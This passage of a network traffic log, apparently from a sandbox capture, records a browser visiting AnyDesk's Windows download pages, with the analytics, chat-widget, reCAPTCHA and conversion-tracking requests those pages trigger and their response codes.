POST https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=303818&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&pf_net=0&pf_srv=1621&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Response

204

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=utgTKR&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Response

200

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=386148&h=16&m=8&s=6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=mOtKQg&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Response

204

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=540590&h=16&m=8&s=14&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&pf_net=0&pf_srv=7&pf_tfr=3&pf_dm1=138&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=8fkld6&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=946159&h=16&m=8&s=15&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=DmXfPN&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Response

204

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?action_name=Remote%20Desktop%20Software%20for%20Windows%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=939711&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=hrEkNY&pf_net=0&pf_srv=1&pf_tfr=2&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=PkAOxP&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20&e_n=&ca=1&idsite=3&rec=1&r=238999&h=16&m=8&s=17&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pf_net=0&pf_srv=1&pf_tfr=2&pf_dm1=123&pf_dm2=411&pf_onl=9&pv_id=hrEkNY&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Response

204

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=074151&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&pf_net=0&pf_srv=4&pf_tfr=1&pf_dm1=105&pf_dm2=567&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=RA4N7f&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=942202&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Response

204
172.217.169.67:443

https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

tls, http2

msedge.exe

8.2kB
230.1kB
94
220

HTTP Request

GET https://www.recaptcha.net/recaptcha/api.js?onload=recaptchaLoadedNewsletter

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4evgzb17fsy2

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/webworker.js?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

HTTP Request

GET https://www.recaptcha.net/recaptcha/api.js?onload=recaptchaLoaded

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=4zzyes9x2aij

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=5u82n46qpzr3

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=yxyzxcqefvk

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=xelbucohh9ws

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0&co=aHR0cHM6Ly9hbnlkZXNrLmNvbTo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=1sppy93msb7l

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0

HTTP Request

GET https://www.recaptcha.net/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LcHubcUAAAAAHu47kB18HgzxqvE3j-fyMIs8Jv0
104.16.139.209:443

https://js.hs-scripts.com/7940397.js

tls, http2

msedge.exe

2.7kB
5.4kB
36
38

HTTP Request

GET https://js.hs-scripts.com/7940397.js

HTTP Response

200
104.18.30.176:443

https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/thank-you?dv=win_exe&e=

tls, http2

msedge.exe

4.7kB
39.9kB
61
77

HTTP Request

GET https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en&e=

HTTP Response

403

HTTP Request

GET https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

HTTP Response

403

HTTP Request

GET https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

HTTP Response

403

HTTP Request

GET https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/windows&e=

HTTP Response

403

HTTP Request

GET https://tracking.g2crowd.com/attribution_tracking/conversions/2446.js?p=https://anydesk.com/en/downloads/thank-you?dv=win_exe&e=

HTTP Response

403
104.16.117.116:443

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

tls, http2

msedge.exe

86.5kB
250.2kB
246
356

HTTP Request

GET https://js.hubspot.com/web-interactives-embed.js

HTTP Response

200

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F

HTTP Request

GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen&referrer=https%3A%2F%2Fwww.bing.com%2F

HTTP Response

200

HTTP Request

GET https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&traceId=8893101b35bc4d91b27a3a37f6a31415&referrer=https%3A%2F%2Fwww.bing.com%2F

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false

HTTP Response

200

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

GET https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=8893101b35bc4d91b27a3a37f6a31415&sessionId=AMOaWbLdq_g1gMPB8psWFrdRuVzob_tYgwG-BTSelq8Ua3wdFTplyfsORxPYaDte2dQQfOMhYBHFvBj-7JfWqQ2bcIdQduzd-aiA_3_XTr0xl5I-Kofk2WKay5rvOdeIaSqwV67Zveb6-Puneztsl0islqcPmXEjuEBddHYZ96vQe1XO4XmOPlA

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

HTTP Response

204

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&referrer=https%3A%2F%2Fanydesk.com%2Fen

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=db7c004362b043ef83c4525605f064de&traceId=db7c004362b043ef83c4525605f064de&referrer=https%3A%2F%2Fanydesk.com%2Fen

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

200

HTTP Request

GET https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

GET https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=32216ffab9654500808a6fcc397a1456&sessionId=AMOaWbL1L8OpPyTgdta4QgBD_o5KdDzbrK4fqCIHkP4RRmkD--pJrpvnemxkZYbUObbCRlileWx9WhliMvJSuVJG_RZENoQZ6R9DFhUtjOZR1kHqu2kvbzz4KFxfR1XMWQFujL8yGFrIvq1Z-JONsym3Txq5dBPKKzF78nEVsnWbCtffnpqKUOU&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Response

204

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&traceId=19d7532a5e5749fbbfb32b46383ca6b0&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

200

HTTP Request

GET https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

GET https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=19d7532a5e5749fbbfb32b46383ca6b0&sessionId=AMOaWbJ1BLIlIgkW-g2hYZQdWjb8QTD0Lg6pw6AD_d3aISYCt4YuwA1HKKBLv7YTFTi5vx56oxJNAQG5ErXzHNhBJcGKqmr6amnYTAl8cNyYXB3THJci8UxlL5JftpOxQu0eYon93LuaZuVitgzriB1piJmLqlCf4kQbjpeP_aHudBvJjPgCM70&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Request

GET https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144496575&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.2.1728144483689&cc=15

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

HTTP Request

GET https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

204

HTTP Request

OPTIONS https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Response

200

HTTP Request

GET https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

HTTP Request

GET https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144497602&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.3.1728144483689&cc=15

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://app.hubspot.com/conversations-visitor/7940397/threads/utk/c08b002be84840e4bf63c5e98ea0ad79?uuid=905453b86c4542a58acfea7db80e8d30&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

HTTP Request

GET https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=c08b002be84840e4bf63c5e98ea0ad79&sessionId=AMOaWbJF-0X466NZJUYCUmi7wqCtj8AxLECR1JWKS-NiJL6usKc5tKtppTGrRpRQlo1ZPdlaG7j-0PZ-Fj4Mse_sWjAURfyPaVENfaYw0WL1dguK1Zq1UobyhA8vyPDKREjsissVUDU2e8XjXeYjLaNdCE9kE6_i1IkiwW9Qb1wZFxDXFnwDM24&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Response

200

HTTP Request

POST https://app.hubspot.com/api/cartographer/v1/ipl

HTTP Response

204

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

HTTP Request

POST https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

HTTP Response

204

HTTP Response

204

HTTP Request

